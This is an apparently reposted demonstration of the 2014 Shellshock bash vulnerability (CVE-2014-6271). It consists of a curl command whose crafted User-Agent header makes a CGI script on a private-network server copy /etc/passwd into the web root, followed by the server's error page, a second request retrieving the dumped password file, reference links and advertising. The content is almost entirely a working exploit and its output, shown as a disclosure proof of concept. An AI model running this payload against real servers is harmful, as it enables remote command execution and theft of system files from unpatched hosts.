poc.cgi $ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi

< !DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
 
 
 
Internal Server Error
 
The server encountered an internal error or 
misconfiguration and was unable to complete 
your request.
 
Please contact the server administrator, 
webmaster@localhost and inform them of the time the error occurred, 
and anything you might have done that may have 
caused the error.
 
More information about this error may be available 
in the server error log.
 
 
Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80
 

$ curl http://192.168.0.1/dumped_file

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
Debian-exim:x:101:103::/var/spool/exim4:/bin/false 
statd:x:102:65534::/var/lib/nfs:/bin/false 
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

来自：https://www.invisiblethreat.ca/2014/09/cve-2014-6271/ 相关链接： http://marc.info/?l=oss-security&m=141157106132018&w=2 http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ http://seclists.org/oss-sec/2014/q3/650 http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN http://pastebin.com/8NRv7s1Z http://pastebin.com/kQ5ppEZD http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter PS：ModSecurity声称已经针对CVE-2014-6271完善了过滤规则。

关注公众号：拾黑（shiheibook）了解更多

[广告]赞助链接：

四季很好，只要有你，文娱排行榜：https://www.yaopaiming.com/
让资讯触达的更精准有趣：https://www.0xu.cn/